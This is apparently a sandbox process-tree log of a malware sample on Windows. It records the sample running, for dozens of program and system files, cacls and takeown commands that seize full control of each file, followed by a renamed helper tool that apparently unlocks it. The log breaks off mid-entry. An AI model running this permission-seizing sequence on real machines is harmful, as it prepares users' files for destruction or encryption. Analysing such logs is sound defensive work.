C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵
- Modifies file permissions
PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:1028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "brt32.clx" -nobanner3⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "brt32.clx" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵
- Modifies file permissions
PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "eng32.clx" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "eng32.clx" -nobanner4⤵PID:524
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:1888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "symbol.txt" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "symbol.txt" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵
- Modifies file permissions
PID:1236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:1416
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:1080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "watermark.png" -nobanner3⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "watermark.png" -nobanner4⤵PID:296
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:1580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "background.png" -nobanner3⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "background.png" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:1804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵PID:1860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "WinMail.exe" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "WinMail.exe" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:1892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "directories.acrodata" -nobanner3⤵PID:292
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "device.png" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "device.png" -nobanner4⤵PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "superbar.png" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "superbar.png" -nobanner4⤵PID:1468
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵PID:1324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "classes.jsa" -nobanner3⤵PID:296
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "classes.jsa" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:1780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""2⤵PID:1820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"3⤵
- Modifies file permissions
PID:484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:280
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""2⤵PID:1080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"3⤵PID:296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Graph.jtp" -nobanner3⤵PID:1260
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Graph.jtp" -nobanner4⤵PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1892
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1096
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1404
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:1580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:1888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵
- Modifies file permissions
PID:1840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "tl.gif" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "tl.gif" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:1404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1344
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:1804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:484
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:1324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵
- Modifies file permissions
PID:1376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "SY______.PFM" -nobanner4⤵PID:944
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:1512
-
-
